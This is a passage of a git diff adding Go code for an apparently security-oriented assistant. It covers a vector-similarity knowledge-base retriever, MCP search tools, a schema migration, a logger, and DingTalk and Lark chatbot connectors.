r.rerankMu.Lock() + defer r.rerankMu.Unlock() + r.reranker = rr +} + +func (r *Retriever) documentReranker() DocumentReranker { + if r == nil { + return nil + } + r.rerankMu.RLock() + defer r.rerankMu.RUnlock() + return r.reranker +} + +func cosineSimilarity(a, b []float32) float64 { + if len(a) != len(b) { + return 0.0 + } + + var dotProduct, normA, normB float64 + for i := range a { + dotProduct += float64(a[i] * b[i]) + normA += float64(a[i] * a[i]) + normB += float64(b[i] * b[i]) + } + + if normA == 0 || normB == 0 { + return 0.0 + } + + return dotProduct / (math.Sqrt(normA) * math.Sqrt(normB)) +} + +// Search 搜索知识库。统一经 [VectorEinoRetriever](Eino retriever.Retriever 边界)。 +func (r *Retriever) Search(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) { + if req == nil { + return nil, fmt.Errorf("请求不能为空") + } + q := strings.TrimSpace(req.Query) + if q == "" { + return nil, fmt.Errorf("查询不能为空") + } + opts := r.einoRetrieverOptions(req) + docs, err := NewVectorEinoRetriever(r).Retrieve(ctx, q, opts...) + if err != nil { + return nil, err + } + return documentsToRetrievalResults(docs) +} + +func (r *Retriever) einoRetrieverOptions(req *SearchRequest) []retriever.Option { + var opts []retriever.Option + if req.TopK > 0 { + opts = append(opts, retriever.WithTopK(req.TopK)) + } + dsl := map[string]any{} + if strings.TrimSpace(req.RiskType) != "" { + dsl[DSLRiskType] = strings.TrimSpace(req.RiskType) + } + if req.Threshold > 0 { + dsl[DSLSimilarityThreshold] = req.Threshold + } + if strings.TrimSpace(req.SubIndexFilter) != "" { + dsl[DSLSubIndexFilter] = strings.TrimSpace(req.SubIndexFilter) + } + if len(dsl) > 0 { + opts = append(opts, retriever.WithDSLInfo(dsl)) + } + return opts +} + +// EinoRetrieve 直接返回 [schema.Document],供 Eino Graph / Chain 使用。 +func (r *Retriever) EinoRetrieve(ctx context.Context, query string, opts ...retriever.Option) ([]*schema.Document, error) { + return NewVectorEinoRetriever(r).Retrieve(ctx, query, opts...) +} + +func (r *Retriever) knowledgeEmbeddingSelectSQL(riskType, subIndexFilter string) (string, []interface{}) { + q := `SELECT e.id, e.item_id, e.chunk_index, e.chunk_text, e.embedding, e.embedding_model, e.embedding_dim, i.category, i.title +FROM knowledge_embeddings e +JOIN knowledge_base_items i ON e.item_id = i.id +WHERE 1=1` + var args []interface{} + if strings.TrimSpace(riskType) != "" { + q += ` AND TRIM(i.category) = TRIM(?) COLLATE NOCASE` + args = append(args, riskType) + } + if tag := strings.TrimSpace(subIndexFilter); tag != "" { + tag = strings.ToLower(strings.ReplaceAll(tag, " ", "")) + q += ` AND (TRIM(COALESCE(e.sub_indexes,'')) = '' OR INSTR(',' || LOWER(REPLACE(e.sub_indexes,' ','')) || ',', ',' || ? || ',') > 0)` + args = append(args, tag) + } + return q, args +} + +// vectorSearch 纯向量检索:余弦相似度排序,按相似度阈值与 TopK 截断(无 BM25、无混合分、无邻块扩展)。 +func (r *Retriever) vectorSearch(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) { + if req.Query == "" { + return nil, fmt.Errorf("查询不能为空") + } + + topK := req.TopK + if topK <= 0 && r.config != nil { + topK = r.config.TopK + } + if topK <= 0 { + topK = 5 + } + + threshold := req.Threshold + if threshold <= 0 && r.config != nil { + threshold = r.config.SimilarityThreshold + } + if threshold <= 0 { + threshold = 0.7 + } + + subIdxFilter := strings.TrimSpace(req.SubIndexFilter) + if subIdxFilter == "" && r.config != nil { + subIdxFilter = strings.TrimSpace(r.config.SubIndexFilter) + } + + queryText := FormatQueryEmbeddingText(req.RiskType, req.Query) + queryEmbedding, err := r.embedder.EmbedText(ctx, queryText) + if err != nil { + return nil, fmt.Errorf("向量化查询失败: %w", err) + } + queryDim := len(queryEmbedding) + expectedModel := "" + if r.embedder != nil { + expectedModel = r.embedder.EmbeddingModelName() + } + + sqlStr, sqlArgs := r.knowledgeEmbeddingSelectSQL(strings.TrimSpace(req.RiskType), subIdxFilter) + rows, err := r.db.QueryContext(ctx, sqlStr, sqlArgs...) + if err != nil { + return nil, fmt.Errorf("查询向量失败: %w", err) + } + defer rows.Close() + + type candidate struct { + chunk *KnowledgeChunk + item *KnowledgeItem + similarity float64 + } + + candidates := make([]candidate, 0) + rowNum := 0 + for rows.Next() { + rowNum++ + if rowNum%48 == 0 { + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + } + } + + var chunkID, itemID, chunkText, embeddingJSON, category, title, rowModel string + var chunkIndex, rowDim int + + if err := rows.Scan(&chunkID, &itemID, &chunkIndex, &chunkText, &embeddingJSON, &rowModel, &rowDim, &category, &title); err != nil { + r.logger.Warn("扫描向量失败", zap.Error(err)) + continue + } + + var embedding []float32 + if err := json.Unmarshal([]byte(embeddingJSON), &embedding); err != nil { + r.logger.Warn("解析向量失败", zap.Error(err)) + continue + } + + if rowDim > 0 && len(embedding) != rowDim { + r.logger.Debug("跳过维度不一致的向量行", zap.String("chunkId", chunkID), zap.Int("rowDim", rowDim), zap.Int("got", len(embedding))) + continue + } + if queryDim > 0 && len(embedding) != queryDim { + r.logger.Debug("跳过与查询维度不一致的向量", zap.String("chunkId", chunkID), zap.Int("queryDim", queryDim), zap.Int("got", len(embedding))) + continue + } + if expectedModel != "" && strings.TrimSpace(rowModel) != "" && strings.TrimSpace(rowModel) != expectedModel { + r.logger.Debug("跳过嵌入模型不一致的行", zap.String("chunkId", chunkID), zap.String("rowModel", rowModel), zap.String("expected", expectedModel)) + continue + } + + similarity := cosineSimilarity(queryEmbedding, embedding) + candidates = append(candidates, candidate{ + chunk: &KnowledgeChunk{ + ID: chunkID, + ItemID: itemID, + ChunkIndex: chunkIndex, + ChunkText: chunkText, + Embedding: embedding, + }, + item: &KnowledgeItem{ + ID: itemID, + Category: category, + Title: title, + }, + similarity: similarity, + }) + } + + sort.Slice(candidates, func(i, j int) bool { + return candidates[i].similarity > candidates[j].similarity + }) + + filtered := make([]candidate, 0, len(candidates)) + for _, c := range candidates { + if c.similarity >= threshold { + filtered = append(filtered, c) + } + } + + if len(filtered) > topK { + filtered = filtered[:topK] + } + + results := make([]*RetrievalResult, len(filtered)) + for i, c := range filtered { + results[i] = &RetrievalResult{ + Chunk: c.chunk, + Item: c.item, + Similarity: c.similarity, + Score: c.similarity, + } + } + return results, nil +} + +// AsEinoRetriever 将纯向量检索暴露为 Eino [retriever.Retriever]。 +func (r *Retriever) AsEinoRetriever() retriever.Retriever { + return NewVectorEinoRetriever(r) +} diff --git a/knowledge/schema_migrate.go b/knowledge/schema_migrate.go new file mode 100644 index 00000000..85fd26e2 --- /dev/null +++ b/knowledge/schema_migrate.go @@ -0,0 +1,51 @@ +package knowledge + +import ( + "database/sql" + "fmt" +) + +// EnsureKnowledgeEmbeddingsSchema migrates knowledge_embeddings for sub_indexes + embedding metadata. +func EnsureKnowledgeEmbeddingsSchema(db *sql.DB) error { + if db == nil { + return fmt.Errorf("db is nil") + } + var n int + if err := db.QueryRow(`SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='knowledge_embeddings'`).Scan(&n); err != nil { + return err + } + if n == 0 { + return nil + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "sub_indexes", + `ALTER TABLE knowledge_embeddings ADD COLUMN sub_indexes TEXT NOT NULL DEFAULT ''`); err != nil { + return err + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_model", + `ALTER TABLE knowledge_embeddings ADD COLUMN embedding_model TEXT NOT NULL DEFAULT ''`); err != nil { + return err + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_dim", + `ALTER TABLE knowledge_embeddings ADD COLUMN embedding_dim INTEGER NOT NULL DEFAULT 0`); err != nil { + return err + } + return nil +} + +func addKnowledgeEmbeddingsColumnIfMissing(db *sql.DB, column, alterSQL string) error { + var colCount int + q := `SELECT COUNT(*) FROM pragma_table_info('knowledge_embeddings') WHERE name = ?` + if err := db.QueryRow(q, column).Scan(&colCount); err != nil { + return err + } + if colCount > 0 { + return nil + } + _, err := db.Exec(alterSQL) + return err +} + +// ensureKnowledgeEmbeddingsSubIndexesColumn 向后兼容;请使用 [EnsureKnowledgeEmbeddingsSchema]。 +func ensureKnowledgeEmbeddingsSubIndexesColumn(db *sql.DB) error { + return EnsureKnowledgeEmbeddingsSchema(db) +} diff --git a/knowledge/tool.go b/knowledge/tool.go new file mode 100644 index 00000000..c7aa3f68 --- /dev/null +++ b/knowledge/tool.go @@ -0,0 +1,323 @@ +package knowledge + +import ( + "context" + "encoding/json" + "fmt" + "sort" + "strings" + + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "go.uber.org/zap" +) + +// RegisterKnowledgeTool 注册知识检索工具到MCP服务器 +func RegisterKnowledgeTool( + mcpServer *mcp.Server, + retriever *Retriever, + manager *Manager, + logger *zap.Logger, +) { + // 注册第一个工具:获取所有可用的风险类型列表 + listRiskTypesTool := mcp.Tool{ + Name: builtin.ToolListKnowledgeRiskTypes, + Description: "获取知识库中所有可用的风险类型(risk_type)列表。在搜索知识库之前,可以先调用此工具获取可用的风险类型,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间并提高检索准确性。", + ShortDescription: "获取知识库中所有可用的风险类型列表", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{}, + "required": []string{}, + }, + } + + listRiskTypesHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + categories, err := manager.GetCategories() + if err != nil { + logger.Error("获取风险类型列表失败", zap.Error(err)) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("获取风险类型列表失败: %v", err), + }, + }, + IsError: true, + }, nil + } + + if len(categories) == 0 { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "知识库中暂无风险类型。", + }, + }, + }, nil + } + + var resultText strings.Builder + resultText.WriteString(fmt.Sprintf("知识库中共有 %d 个风险类型:\n\n", len(categories))) + for i, category := range categories { + resultText.WriteString(fmt.Sprintf("%d. %s\n", i+1, category)) + } + resultText.WriteString("\n提示:在调用 " + builtin.ToolSearchKnowledgeBase + " 工具时,可以使用上述风险类型之一作为 risk_type 参数,以缩小搜索范围并提高检索效率。") + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: resultText.String(), + }, + }, + }, nil + } + + mcpServer.RegisterTool(listRiskTypesTool, listRiskTypesHandler) + logger.Info("风险类型列表工具已注册", zap.String("toolName", listRiskTypesTool.Name)) + + // 注册第二个工具:搜索知识库(保持原有功能) + searchTool := mcp.Tool{ + Name: builtin.ToolSearchKnowledgeBase, + Description: "在知识库中搜索相关的安全知识。当你需要了解特定漏洞类型、攻击技术、检测方法等安全知识时,可以使用此工具进行检索。工具基于向量嵌入与余弦相似度检索(与 Eino retriever 语义一致)。建议:在搜索前可以先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型,然后使用正确的 risk_type 参数进行精确搜索,这样可以大幅减少检索时间。", + ShortDescription: "搜索知识库中的安全知识(向量语义检索)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "query": map[string]interface{}{ + "type": "string", + "description": "搜索查询内容,描述你想要了解的安全知识主题", + }, + "risk_type": map[string]interface{}{ + "type": "string", + "description": "可选:指定风险类型(如:SQL注入、XSS、文件上传等)。建议先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型列表,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间。如果不指定则搜索所有类型。", + }, + }, + "required": []string{"query"}, + }, + } + + searchHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + query, ok := args["query"].(string) + if !ok || query == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: 查询参数不能为空", + }, + }, + IsError: true, + }, nil + } + + riskType := "" + if rt, ok := args["risk_type"].(string); ok && rt != "" { + riskType = rt + } + + logger.Info("执行知识库检索", + zap.String("query", query), + zap.String("riskType", riskType), + ) + + // 检索统一走 Retriever.Search → VectorEinoRetriever(Eino retriever 语义)。 + searchReq := &SearchRequest{ + Query: query, + RiskType: riskType, + TopK: 5, + } + + results, err := retriever.Search(ctx, searchReq) + if err != nil { + logger.Error("知识库检索失败", zap.Error(err)) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("检索失败: %v", err), + }, + }, + IsError: true, + }, nil + } + + if len(results) == 0 { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("未找到与查询 '%s' 相关的知识。建议:\n1. 尝试使用不同的关键词\n2. 检查风险类型是否正确\n3. 确认知识库中是否包含相关内容", query), + }, + }, + }, nil + } + + // 格式化结果 + var resultText strings.Builder + + // 按余弦相似度(Score)降序 + sort.Slice(results, func(i, j int) bool { + return results[i].Score > results[j].Score + }) + + // 按文档分组结果,以便更好地展示上下文 + type itemGroup struct { + itemID string + results []*RetrievalResult + maxScore float64 // 该文档块的最高相似度 + } + itemGroups := make([]*itemGroup, 0) + itemMap := make(map[string]*itemGroup) + + for _, result := range results { + itemID := result.Item.ID + group, exists := itemMap[itemID] + if !exists { + group = &itemGroup{ + itemID: itemID, + results: make([]*RetrievalResult, 0), + maxScore: result.Score, + } + itemMap[itemID] = group + itemGroups = append(itemGroups, group) + } + group.results = append(group.results, result) + if result.Score > group.maxScore { + group.maxScore = result.Score + } + } + + // 按文档内最高相似度排序 + sort.Slice(itemGroups, func(i, j int) bool { + return itemGroups[i].maxScore > itemGroups[j].maxScore + }) + + // 收集检索到的知识项ID(用于日志) + retrievedItemIDs := make([]string, 0, len(itemGroups)) + + resultText.WriteString(fmt.Sprintf("找到 %d 条相关知识片段:\n\n", len(results))) + + resultIndex := 1 + for _, group := range itemGroups { + itemResults := group.results + mainResult := itemResults[0] + maxScore := mainResult.Score + for _, result := range itemResults { + if result.Score > maxScore { + maxScore = result.Score + mainResult = result + } + } + + // 按chunk_index排序,保证阅读的逻辑顺序(文档的原始顺序) + sort.Slice(itemResults, func(i, j int) bool { + return itemResults[i].Chunk.ChunkIndex < itemResults[j].Chunk.ChunkIndex + }) + + resultText.WriteString(fmt.Sprintf("--- 结果 %d (相似度: %.2f%%) ---\n", + resultIndex, mainResult.Similarity*100)) + resultText.WriteString(fmt.Sprintf("来源: [%s] %s (ID: %s)\n", mainResult.Item.Category, mainResult.Item.Title, mainResult.Item.ID)) + + // 按逻辑顺序显示所有chunk(包括主结果和扩展的chunk) + if len(itemResults) == 1 { + // 只有一个chunk,直接显示 + resultText.WriteString(fmt.Sprintf("内容片段:\n%s\n", mainResult.Chunk.ChunkText)) + } else { + // 多个chunk,按逻辑顺序显示 + resultText.WriteString("内容片段(按文档顺序):\n") + for i, result := range itemResults { + // 标记主结果 + marker := "" + if result.Chunk.ID == mainResult.Chunk.ID { + marker = " [主匹配]" + } + resultText.WriteString(fmt.Sprintf(" [片段 %d%s]\n%s\n", i+1, marker, result.Chunk.ChunkText)) + } + } + resultText.WriteString("\n") + + if !contains(retrievedItemIDs, group.itemID) { + retrievedItemIDs = append(retrievedItemIDs, group.itemID) + } + resultIndex++ + } + + // 在结果末尾添加元数据(JSON格式,用于提取知识项ID) + // 使用特殊标记,避免影响AI阅读结果 + if len(retrievedItemIDs) > 0 { + metadataJSON, _ := json.Marshal(map[string]interface{}{ + "_metadata": map[string]interface{}{ + "retrievedItemIDs": retrievedItemIDs, + }, + }) + resultText.WriteString(fmt.Sprintf("\n", string(metadataJSON))) + } + + // 记录检索日志(异步,不阻塞) + // 注意:这里没有conversationID和messageID,需要在Agent层面记录 + // 实际的日志记录应该在Agent的progressCallback中完成 + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: resultText.String(), + }, + }, + }, nil + } + + mcpServer.RegisterTool(searchTool, searchHandler) + logger.Info("知识检索工具已注册", zap.String("toolName", searchTool.Name)) +} + +// contains 检查切片是否包含元素 +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// GetRetrievalMetadata 从工具调用中提取检索元数据(用于日志记录) +func GetRetrievalMetadata(args map[string]interface{}) (query string, riskType string) { + if q, ok := args["query"].(string); ok { + query = q + } + if rt, ok := args["risk_type"].(string); ok { + riskType = rt + } + return +} + +// FormatRetrievalResults 格式化检索结果为字符串(用于日志) +func FormatRetrievalResults(results []*RetrievalResult) string { + if len(results) == 0 { + return "未找到相关结果" + } + + var builder strings.Builder + builder.WriteString(fmt.Sprintf("检索到 %d 条结果:\n", len(results))) + + itemIDs := make(map[string]bool) + for i, result := range results { + builder.WriteString(fmt.Sprintf("%d. [%s] %s (相似度: %.2f%%)\n", + i+1, result.Item.Category, result.Item.Title, result.Similarity*100)) + itemIDs[result.Item.ID] = true + } + + // 返回知识项ID列表(JSON格式) + ids := make([]string, 0, len(itemIDs)) + for id := range itemIDs { + ids = append(ids, id) + } + idsJSON, _ := json.Marshal(ids) + builder.WriteString(fmt.Sprintf("\n检索到的知识项ID: %s", string(idsJSON))) + + return builder.String() +} diff --git a/knowledge/types.go b/knowledge/types.go new file mode 100644 index 00000000..42e35e76 --- /dev/null +++ b/knowledge/types.go @@ -0,0 +1,123 @@ +package knowledge + +import ( + "encoding/json" + "time" +) + +// formatTime 格式化时间为 RFC3339 格式,零时间返回空字符串 +func formatTime(t time.Time) string { + if t.IsZero() { + return "" + } + return t.Format(time.RFC3339) +} + +// KnowledgeItem 知识库项 +type KnowledgeItem struct { + ID string `json:"id"` + Category string `json:"category"` // 风险类型(文件夹名) + Title string `json:"title"` // 标题(文件名) + FilePath string `json:"filePath"` // 文件路径 + Content string `json:"content"` // 文件内容 + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// KnowledgeItemSummary 知识库项摘要(用于列表,不包含完整内容) +type KnowledgeItemSummary struct { + ID string `json:"id"` + Category string `json:"category"` + Title string `json:"title"` + FilePath string `json:"filePath"` + Content string `json:"content,omitempty"` // 可选:内容预览(如果提供,通常只包含前 150 字符) + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (k *KnowledgeItemSummary) MarshalJSON() ([]byte, error) { + type Alias KnowledgeItemSummary + aux := &struct { + *Alias + CreatedAt string `json:"createdAt"` + UpdatedAt string `json:"updatedAt"` + }{ + Alias: (*Alias)(k), + } + aux.CreatedAt = formatTime(k.CreatedAt) + aux.UpdatedAt = formatTime(k.UpdatedAt) + return json.Marshal(aux) +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (k *KnowledgeItem) MarshalJSON() ([]byte, error) { + type Alias KnowledgeItem + aux := &struct { + *Alias + CreatedAt string `json:"createdAt"` + UpdatedAt string `json:"updatedAt"` + }{ + Alias: (*Alias)(k), + } + aux.CreatedAt = formatTime(k.CreatedAt) + aux.UpdatedAt = formatTime(k.UpdatedAt) + return json.Marshal(aux) +} + +// KnowledgeChunk 知识块(用于向量化) +type KnowledgeChunk struct { + ID string `json:"id"` + ItemID string `json:"itemId"` + ChunkIndex int `json:"chunkIndex"` + ChunkText string `json:"chunkText"` + Embedding []float32 `json:"-"` // 向量嵌入,不序列化到 JSON + CreatedAt time.Time `json:"createdAt"` +} + +// RetrievalResult 检索结果 +type RetrievalResult struct { + Chunk *KnowledgeChunk `json:"chunk"` + Item *KnowledgeItem `json:"item"` + Similarity float64 `json:"similarity"` // 相似度分数 + Score float64 `json:"score"` // 与 Similarity 相同:余弦相似度 +} + +// RetrievalLog 检索日志 +type RetrievalLog struct { + ID string `json:"id"` + ConversationID string `json:"conversationId,omitempty"` + MessageID string `json:"messageId,omitempty"` + Query string `json:"query"` + RiskType string `json:"riskType,omitempty"` + RetrievedItems []string `json:"retrievedItems"` // 检索到的知识项 ID 列表 + CreatedAt time.Time `json:"createdAt"` +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (r *RetrievalLog) MarshalJSON() ([]byte, error) { + type Alias RetrievalLog + return json.Marshal(&struct { + *Alias + CreatedAt string `json:"createdAt"` + }{ + Alias: (*Alias)(r), + CreatedAt: formatTime(r.CreatedAt), + }) +} + +// CategoryWithItems 分类及其下的知识项(用于按分类分页) +type CategoryWithItems struct { + Category string `json:"category"` // 分类名称 + ItemCount int `json:"itemCount"` // 该分类下的知识项总数 + Items []*KnowledgeItemSummary `json:"items"` // 该分类下的知识项列表 +} + +// SearchRequest 搜索请求 +type SearchRequest struct { + Query string `json:"query"` + RiskType string `json:"riskType,omitempty"` // 可选:指定风险类型 + SubIndexFilter string `json:"subIndexFilter,omitempty"` // 可选:仅保留 sub_indexes 含该标签的行(含未打标旧数据) + TopK int `json:"topK,omitempty"` // 返回 Top-K 结果,默认 5 + Threshold float64 `json:"threshold,omitempty"` // 相似度阈值,默认 0.7 +} diff --git a/logger/logger.go b/logger/logger.go new file mode 100644 index 00000000..7e306fab --- /dev/null +++ b/logger/logger.go @@ -0,0 +1,68 @@ +package logger + +import ( + "os" + + "go.uber.org/zap" + "go.uber.org/zap/zapcore" +) + +type Logger struct { + *zap.Logger +} + +func New(level, output string) *Logger { + var zapLevel zapcore.Level + switch level { + case "debug": + zapLevel = zapcore.DebugLevel + case "info": + zapLevel = zapcore.InfoLevel + case "warn": + zapLevel = zapcore.WarnLevel + case "error": + zapLevel = zapcore.ErrorLevel + default: + zapLevel = zapcore.InfoLevel + } + + config := zap.NewProductionConfig() + config.Level = zap.NewAtomicLevelAt(zapLevel) + config.EncoderConfig.TimeKey = "timestamp" + config.EncoderConfig.EncodeTime = zapcore.ISO8601TimeEncoder + + var writeSyncer zapcore.WriteSyncer + if output == "stdout" { + writeSyncer = zapcore.AddSync(os.Stdout) + } else { + file, err := os.OpenFile(output, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666) + if err != nil { + writeSyncer = zapcore.AddSync(os.Stdout) + } else { + writeSyncer = zapcore.AddSync(file) + } + } + + core := zapcore.NewCore( + zapcore.NewJSONEncoder(config.EncoderConfig), + writeSyncer, + zapLevel, + ) + + logger := zap.New(core, zap.AddCaller(), zap.AddStacktrace(zapcore.ErrorLevel)) + + return &Logger{Logger: logger} +} + +func (l *Logger) Fatal(msg string, fields ...interface{}) { + zapFields := make([]zap.Field, 0, len(fields)) + for _, f := range fields { + switch v := f.(type) { + case error: + zapFields = append(zapFields, zap.Error(v)) + default: + zapFields = append(zapFields, zap.Any("field", v)) + } + } + l.Logger.Fatal(msg, zapFields...) +} diff --git a/robot/conn.go b/robot/conn.go new file mode 100644 index 00000000..d57e361d --- /dev/null +++ b/robot/conn.go @@ -0,0 +1,6 @@ +package robot + +// MessageHandler 供飞书/钉钉长连接调用的消息处理接口(由 handler.RobotHandler 实现) +type MessageHandler interface { + HandleMessage(platform, userID, text string) string +} diff --git a/robot/ding.go b/robot/ding.go new file mode 100644 index 00000000..7f469808 --- /dev/null +++ b/robot/ding.go @@ -0,0 +1,151 @@ +package robot + +import ( + "bytes" + "context" + "encoding/json" + "net/http" + "strings" + "time" + + "cyberstrike-ai/internal/config" + + "github.com/open-dingtalk/dingtalk-stream-sdk-go/chatbot" + "github.com/open-dingtalk/dingtalk-stream-sdk-go/client" + dingutils "github.com/open-dingtalk/dingtalk-stream-sdk-go/utils" + "go.uber.org/zap" +) + +const ( + dingReconnectInitial = 5 * time.Second // 首次重连间隔 + dingReconnectMax = 60 * time.Second // 最大重连间隔 +) + +// StartDing 启动钉钉 Stream 长连接(无需公网),收到消息后调用 handler 并通过 SessionWebhook 回复。 +// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。 +func StartDing(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) { + cfg := robotsCfg.Dingtalk + if !cfg.Enabled || cfg.ClientID == "" || cfg.ClientSecret == "" { + return + } + go runDingLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger) +} + +// runDingLoop 循环维持钉钉长连接:断开且 ctx 未取消时按退避间隔重连。 +func runDingLoop(ctx context.Context, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) { + backoff := dingReconnectInitial + for { + streamClient := client.NewStreamClient( + client.WithAppCredential(client.NewAppCredentialConfig(cfg.ClientID, cfg.ClientSecret)), + client.WithSubscription(dingutils.SubscriptionTypeKCallback, "/v1.0/im/bot/messages/get", + chatbot.NewDefaultChatBotFrameHandler(func(ctx context.Context, msg *chatbot.BotCallbackDataModel) ([]byte, error) { + go handleDingMessage(ctx, msg, cfg, strictUserIdentity, h, logger) + return nil, nil + }).OnEventReceived), + ) + logger.Info("钉钉 Stream 正在连接…", zap.String("client_id", cfg.ClientID)) + err := streamClient.Start(ctx) + if ctx.Err() != nil { + logger.Info("钉钉 Stream 已按配置重启关闭") + return + } + if err != nil { + logger.Warn("钉钉 Stream 长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff)) + } + select { + case <-ctx.Done(): + return + case <-time.After(backoff): + // 下次重连间隔递增,上限 60 秒,避免频繁重试 + if backoff < dingReconnectMax { + backoff *= 2 + if backoff > dingReconnectMax { + backoff = dingReconnectMax + } + } + } + } +} + +func handleDingMessage(ctx context.Context, msg *chatbot.BotCallbackDataModel, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) { + if msg == nil || msg.SessionWebhook == "" { + return + } + content := "" + if msg.Text.Content != "" { + content = strings.TrimSpace(msg.Text.Content) + } + if content == "" && msg.Msgtype == "richText" { + if cMap, ok := msg.Content.(map[string]interface{}); ok { + if rich, ok := cMap["richText"].([]interface{}); ok { + for _, c := range rich { + if m, ok := c.(map[string]interface{}); ok { + if txt, ok := m["text"].(string); ok { + content = strings.TrimSpace(txt) + break + } + } + } + } + } + } + if content == "" { + logger.Debug("钉钉消息内容为空,已忽略", zap.String("msgtype", msg.Msgtype)) + return + } + logger.Info("钉钉收到消息", zap.String("sender", msg.SenderId), zap.String("content", content)) + tenantKey := strings.TrimSpace(cfg.ClientID) + if tenantKey == "" { + tenantKey = "default" + } + userID := strings.TrimSpace(msg.SenderId) + if userID != "" { + userID = "t:" + tenantKey + "|u:" + userID + } else if cfg.AllowConversationIDFallback && !strictUserIdentity { + conversationID := strings.TrimSpace(msg.ConversationId) + if conversationID != "" { + userID = "t:" + tenantKey + "|c:" + conversationID + } + } + if userID == "" { + logger.Warn("钉钉消息缺少可用用户标识,已忽略") + return + } + reply := h.HandleMessage("dingtalk", userID, content) + // 使用 markdown 类型以便正确展示标题、列表、代码块等格式 + title := reply + if idx := strings.IndexAny(reply, "\n"); idx > 0 { + title = strings.TrimSpace(reply[:idx]) + } + if len(title) > 50 { + title = title[:50] + "…" + } + if title == "" { + title = "回复" + } + body := map[string]interface{}{ + "msgtype": "markdown", + "markdown": map[string]string{ + "title": title, + "text": reply, + }, + } + bodyBytes, _ := json.Marshal(body) + req, err := http.NewRequestWithContext(ctx, http.MethodPost, msg.SessionWebhook, bytes.NewReader(bodyBytes)) + if err != nil { + logger.Warn("钉钉构造回复请求失败", zap.Error(err)) + return + } + req.Header.Set("Content-Type", "application/json") + resp, err := http.DefaultClient.Do(req) + if err != nil { + logger.Warn("钉钉回复请求失败", zap.Error(err)) + return + } + defer resp.Body.Close() + if resp.StatusCode != http.StatusOK { + logger.Warn("钉钉回复非 200", zap.Int("status", resp.StatusCode)) + return + } + logger.Debug("钉钉回复成功", zap.String("content_preview", reply)) +} diff --git a/robot/lark.go b/robot/lark.go new file mode 100644 index 00000000..2cda0601 --- /dev/null +++ b/robot/lark.go @@ -0,0 +1,141 @@ +package robot + +import ( + "context" + "encoding/json" + "strings" + "time" + + "cyberstrike-ai/internal/config" + + lark "github.com/larksuite/oapi-sdk-go/v3" + larkcore "github.com/larksuite/oapi-sdk-go/v3/core" + "github.com/larksuite/oapi-sdk-go/v3/event/dispatcher" + larkim "github.com/larksuite/oapi-sdk-go/v3/service/im/v1" + larkws "github.com/larksuite/oapi-sdk-go/v3/ws" + "go.uber.org/zap" +) + +const ( + larkReconnectInitial = 5 * time.Second // 首次重连间隔 + larkReconnectMax = 60 * time.Second // 最大重连间隔 +) + +type larkTextContent struct { + Text string `json:"text"` +} + +// StartLark 启动飞书长连接(无需公网),收到消息后调用 handler 并回复。 +// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。 +func StartLark(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) { + cfg := robotsCfg.Lark + if !cfg.Enabled || cfg.AppID == "" || cfg.AppSecret == "" { + return + } + go runLarkLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger) +} + +// runLarkLoop 循环维持飞书长连接:断开且 ctx 未取消时按退避间隔重连。 +func runLarkLoop(ctx context.Context, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) { + backoff := larkReconnectInitial + for { + larkClient := lark.NewClient(cfg.AppID, cfg.AppSecret) + eventHandler := dispatcher.NewEventDispatcher("", "").OnP2MessageReceiveV1(func(ctx context.Context, event *larkim.P2MessageReceiveV1) error { + go handleLarkMessage(ctx, event, cfg, strictUserIdentity, h, larkClient, logger) + return nil + }) + wsClient := larkws.NewClient(cfg.AppID, cfg.AppSecret, + larkws.WithEventHandler(eventHandler), + larkws.WithLogLevel(larkcore.LogLevelInfo), + ) + logger.Info("飞书长连接正在连接…", zap.String("app_id", cfg.AppID)) + err := wsClient.Start(ctx) + if ctx.Err() != nil { + 